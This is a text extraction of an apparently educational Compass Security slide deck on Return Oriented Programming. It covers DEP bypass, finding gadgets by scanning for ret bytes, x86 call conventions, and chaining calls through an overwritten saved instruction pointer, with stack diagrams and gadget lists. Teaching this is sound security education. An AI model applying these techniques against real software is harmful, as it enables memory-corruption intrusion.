![Page 1: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/1.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Return Oriented Programming
ROP
![Page 2: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/2.jpg)
© Compass Security Schweiz AG Slide 2 www.csnc.ch
Exploit
Mitigations
DEP
PIE
ASLR
Stack
Canary
ASCII Armor
Partial RIP Overwrite
Brute Force
Heap Overflows
Overflow Local Vars
Arbitrary Write
NOP Slide
Info Disclosure
Ret 2 PLT
ROP
![Page 3: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/3.jpg)
© Compass Security Schweiz AG Slide 3 www.csnc.ch
Exploiting: DEP - Memory Layout
Stack
Heap
Code 0x0804800
rw-
rw-
r-x
![Page 4: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/4.jpg)
© Compass Security Schweiz AG Slide 4 www.csnc.ch
Exploiting: DEP - ROP
DEP does not allow execution of uploaded code
But what about existing code?
ROP: smartly put together existing code
![Page 5: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/5.jpg)
© Compass Security Schweiz AG Slide 5 www.csnc.ch
Exploiting: DEP - Memory Layout
Stack
Heap
Code 0x0804800
![Page 6: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/6.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
ROP In One Slide
![Page 7: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/7.jpg)
© Compass Security Schweiz AG Slide 7 www.csnc.ch
ROP Preview
&blubb
SIP (&<func>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<func>)
SIP (&<…>)
0x11
0x22
ret
ret
ret
ret
![Page 8: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/8.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Gadgets
ROP
![Page 9: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/9.jpg)
© Compass Security Schweiz AG Slide 9 www.csnc.ch
Exploiting DEP - ROP
What is ROP?
Smartly chain gadgets together to execute arbitrary code
Gadgets: Some sequence of code, followed by a RET
![Page 10: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/10.jpg)
© Compass Security Schweiz AG Slide 10 www.csnc.ch
Exploiting: DEP ROP - Gadgets
So, what is are gadgets?
pop r15 ; ret
add byte ptr [rcx], al ; ret
dec ecx ; ret
![Page 11: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/11.jpg)
© Compass Security Schweiz AG Slide 11 www.csnc.ch
Exploiting: DEP ROP - Gadgets
add byte ptr [rax], al ; add bl, dh ; ret
add byte ptr [rax], al ; add byte ptr [rax], al ; ret
add byte ptr [rax], al ; add cl, cl ; ret
add byte ptr [rax], al ; add rsp, 8 ; ret
add byte ptr [rax], al ; jmp 0x400839
add byte ptr [rax], al ; leave ; ret
add byte ptr [rax], al ; pop rbp ; ret
add byte ptr [rax], al ; ret
add byte ptr [rcx], al ; ret
add cl, cl ; ret
add eax, 0x20087e ; add ebx, esi ; ret
add eax, 0xb8 ; add cl, cl ; ret
add ebx, esi ; ret
![Page 12: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/12.jpg)
© Compass Security Schweiz AG Slide 12 www.csnc.ch
Exploiting: DEP ROP - Gadgets
How to find gadgets? Search in code section for byte 0xc3 (=ret)
Go backwards, and decode each byte
For each byte:
Check if it is a valid x32 instruction
If yes: add gadget, and continue
If no: continue
80 00 51 02 80 31 60 00 0e 05 c3 20 07 dd da 23
![Page 13: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/13.jpg)
© Compass Security Schweiz AG Slide 13 www.csnc.ch
Exploiting: DEP ROP - Gadgets
How to find gadgets? Search in code section for byte 0xc3 (=ret)
Go backwards, and decode each byte
For each byte:
Check if it is a valid x32 instruction
If yes: add gadget, and continue
If no: continue
80 00 51 02 80 31 60 00 0e 05 c3 20 07 dd da 23
![Page 14: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/14.jpg)
© Compass Security Schweiz AG Slide 14 www.csnc.ch
Exploiting: DEP ROP - Gadgets
How to find gadgets? Search in code section for byte 0xc3 (=ret)
Go backwards, and decode each byte
For each byte:
Check if it is a valid x32 instruction
If yes: add gadget, and continue
If no: continue
80 00 51 02 80 31 60 00 0e 05 c3 20 07 dd da 23
![Page 15: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/15.jpg)
© Compass Security Schweiz AG Slide 15 www.csnc.ch
Exploiting: DEP ROP - Gadgets
There will be gadgets which were not created by the compiler x86 instructions are not static size
1-15bytes
Unlike RISC (usually 4 byte size)
![Page 16: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/16.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
ROP Introduction
Why does ROP work
![Page 17: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/17.jpg)
© Compass Security Schweiz AG Slide 17 www.csnc.ch
Why does ROP work
Executing one gadget is nice
But we want to chain gadgets together
Is this possible?
![Page 18: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/18.jpg)
© Compass Security Schweiz AG Slide 18 www.csnc.ch
Why does ROP work
Remember this? x32 Call convention
Argument 2 for <add>
Saved IP (&return)
Saved Frame Pointer
Local Variables <add>
y
SIP
SFP
c
pop push
Stack Frame
<add>
x Argument 1 for <add>
![Page 19: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/19.jpg)
© Compass Security Schweiz AG Slide 19 www.csnc.ch
Why does ROP work
Lets optimize function calling a bit
Ergo: Lets create our own call convention!
This EBP/SFP thingy
![Page 20: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/20.jpg)
© Compass Security Schweiz AG Slide 20 www.csnc.ch
Why does ROP work
Remember this? x32 Call convention Details
push ebp
mov ebp, esp,
sub esp, 0x10
[Function Code]
mov esp, ebp ; leave
pop ebp ; leave
pop eip ; ret
push 4
push 3
push EIP
jmp <add>
![Page 21: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/21.jpg)
© Compass Security Schweiz AG Slide 21 www.csnc.ch
Why does ROP work
Remember this? x32 Call convention Details
push ebp
mov ebp, esp,
sub esp, 0x10
[Function Code]
mov esp, ebp ; leave
pop ebp ; leave
pop eip ; ret
push 4
push 3
push EIP
jmp <add>
![Page 22: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/22.jpg)
© Compass Security Schweiz AG Slide 22 www.csnc.ch
Why does ROP work
Remember this? x32 Call convention Details
push ebp
mov ebp, esp,
sub esp, 0x10
[Function Code]
mov esp, ebp ; leave
pop ebp ; leave
pop eip ; ret
push 4
push 3
push EIP
jmp <add>
![Page 23: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/23.jpg)
© Compass Security Schweiz AG Slide 23 www.csnc.ch
Why does ROP work
Remember this? x32 Call convention Details
push ebp
mov ebp, esp,
sub esp, 0x10
[Function Code]
mov esp, ebp ; leave
pop ebp ; leave
pop eip ; ret
push 4
push 3
push EIP
jmp <add>
![Page 24: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/24.jpg)
© Compass Security Schweiz AG Slide 24 www.csnc.ch
Why does ROP work
Call is the same! (only caller-internals changed)
push ebp
mov ebp, esp,
sub esp, 0x10
[Function Code]
mov esp, ebp ; leave
pop ebp ; leave
pop eip ; ret
push 4
push 3
push EIP
jmp <add>
![Page 25: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/25.jpg)
© Compass Security Schweiz AG Slide 25 www.csnc.ch
Why does ROP work
How would the stack look like for our self defined call convention?
Argument 2 for <add>
Saved IP (&return)
Saved Frame Pointer
Local Variables <add>
y
SIP
SFP
c
pop push
Stack Frame
<add>
x Argument 1 for <add>
![Page 26: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/26.jpg)
© Compass Security Schweiz AG Slide 26 www.csnc.ch
Why does ROP work
How would the stack look like for our self defined call convention?
Argument 2 for <add>
Saved IP (&return)
Saved Frame Pointer
Local Variables <add>
y
SIP
SFP
c
pop push
Stack Frame
<add>
x Argument 1 for <add>
![Page 27: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/27.jpg)
© Compass Security Schweiz AG Slide 27 www.csnc.ch
Why does ROP work
How would the stack look like for our self defined call convention?
Argument 2
Saved IP (&next instruction)
y
SIP
pop push
x Argument 1
Note: SIP gets pushed by “call”
local variables
![Page 28: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/28.jpg)
© Compass Security Schweiz AG Slide 28 www.csnc.ch
Why does ROP work
How would the stack look like for our self defined call convention?
y
SIP
pop push
x
[Function Code]
ret; // pop EIP
Stack: Function:
RSP
![Page 29: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/29.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
ROP: Remainder: Normal Call
![Page 30: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/30.jpg)
© Compass Security Schweiz AG Slide 30 www.csnc.ch
ROP: Remainder: Normal Call
Lets check again the normal call convention process
![Page 31: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/31.jpg)
© Compass Security Schweiz AG Slide 31 www.csnc.ch
ROP: Remainder: Normal Call
Reminder: Buffer Overflow, Pre-Overflow:
&blubb Argument arg1 for <handleData>
SIP (&mov@main) Saved IP
SFP Saved Frame Pointer
isAdmin Local Variable 1
pop push
firstname
![Page 32: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/32.jpg)
© Compass Security Schweiz AG Slide 32 www.csnc.ch
ROP: Remainder: Normal Call
&blubb
SIP (&mov@main)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
call <handledata> mov …
<main>:
![Page 33: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/33.jpg)
© Compass Security Schweiz AG Slide 33 www.csnc.ch
ROP: Remainder: Normal Call
&blubb
SIP (&mov@main)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
call <handledata> mov …
<main>:
![Page 34: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/34.jpg)
© Compass Security Schweiz AG Slide 34 www.csnc.ch
ROP: Remainder: Normal Call
&blubb
SIP (&mov@main)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
call <handledata> mov …
<main>:
![Page 35: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/35.jpg)
© Compass Security Schweiz AG Slide 35 www.csnc.ch
ROP: Remainder: Normal Call
&blubb
SIP (&mov@main)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
call <handledata> mov …
<main>:
![Page 36: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/36.jpg)
© Compass Security Schweiz AG Slide 36 www.csnc.ch
Exploiting: DEP - ROP
Now, lets add the overflow
![Page 37: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/37.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
ROP By Example
![Page 38: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/38.jpg)
© Compass Security Schweiz AG Slide 38 www.csnc.ch
ROP By Example
int a, int
Hand written assembly, no standard call convention
add:
mov 0x8(%esp),%eax
add 0x4(%esp),%eax
ret
![Page 39: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/39.jpg)
© Compass Security Schweiz AG Slide 39 www.csnc.ch
ROP By Example
SIP2
x
y
&blubb
SIP (&<mov@main>)
SFP
isAdmin
firstname
Overflow
&<add>
Original Stack Overflow Data
handleData() Stack:
![Page 40: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/40.jpg)
© Compass Security Schweiz AG Slide 40 www.csnc.ch
ROP By Example
&blubb
SIP &<add>
SFP
isAdmin
firstname
SIP2
x
y
Stack after Overflow
handleData() Stack:
![Page 41: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/41.jpg)
© Compass Security Schweiz AG Slide 41 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
mov… add… ret
<add>:
&blubb SIP2
x
y
handleData() Stack: On ret@handleData
![Page 42: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/42.jpg)
© Compass Security Schweiz AG Slide 42 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
&blubb SIP2
x
y
mov… add… ret
<add>:
handleData() Stack: After ret@handleData
![Page 43: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/43.jpg)
© Compass Security Schweiz AG Slide 43 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
&blubb SIP2
x
y
mov… add… ret
<add>:
handleData() Stack: On ret@add
![Page 44: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/44.jpg)
© Compass Security Schweiz AG Slide 44 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
&blubb SIP2
x
y
mov… add… ret
<add>:
handleData() Stack: On ret@add
![Page 45: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/45.jpg)
© Compass Security Schweiz AG Slide 45 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
ESP EIP
… ret
<handleData>:
&blubb SIP2
x
y
mov… add… ret
<add>:
![Page 46: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/46.jpg)
© Compass Security Schweiz AG Slide 46 www.csnc.ch
ROP By Example
What does this mean?
Lets do it again... First: call add(0x01, 0x02);
Then: call add2(0x11, 0x22);
![Page 47: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/47.jpg)
© Compass Security Schweiz AG Slide 47 www.csnc.ch
ROP By Example
&blubb
SFP
isAdmin
firstname
&blubb ??
??
??
??
??
??
??
Previous Function
Stack Frame (handleData() doesn’t/can’t
know)
Regular handleData()
Stack Frame
SIP (&<mov@main>)
![Page 48: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/48.jpg)
© Compass Security Schweiz AG Slide 48 www.csnc.ch
ROP By Example
&blubb
SFP
isAdmin
firstname
&blubb ??
??
??
??
??
??
??
Previous Function
Stack Frame (handleData() doesn’t/can’t
know)
Regular handleData()
Stack Frame
SIP (&<mov@main>)
SIP points
to main()
initially
![Page 49: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/49.jpg)
© Compass Security Schweiz AG Slide 49 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11
0x22
The Data we wrote via overflow (red)
![Page 50: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/50.jpg)
© Compass Security Schweiz AG Slide 50 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11
0x22
add2 Stuff
add Stuff
Stack Frame
<handleData>
![Page 51: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/51.jpg)
© Compass Security Schweiz AG Slide 51 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11
0x22
add2 Stuff
add Stuff
Stack Frame
<handleData>
SIP points
to add()
now!
![Page 52: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/52.jpg)
© Compass Security Schweiz AG Slide 52 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
… ret
<handleData>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add>:
0x22
![Page 53: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/53.jpg)
© Compass Security Schweiz AG Slide 53 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
… ret
<handleData>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add>:
0x22
![Page 54: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/54.jpg)
© Compass Security Schweiz AG Slide 54 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
… ret
<handleData>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add>:
0x22
![Page 55: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/55.jpg)
© Compass Security Schweiz AG Slide 55 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
pop eax pop ebx ret
<0xaabb>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add>:
0x22
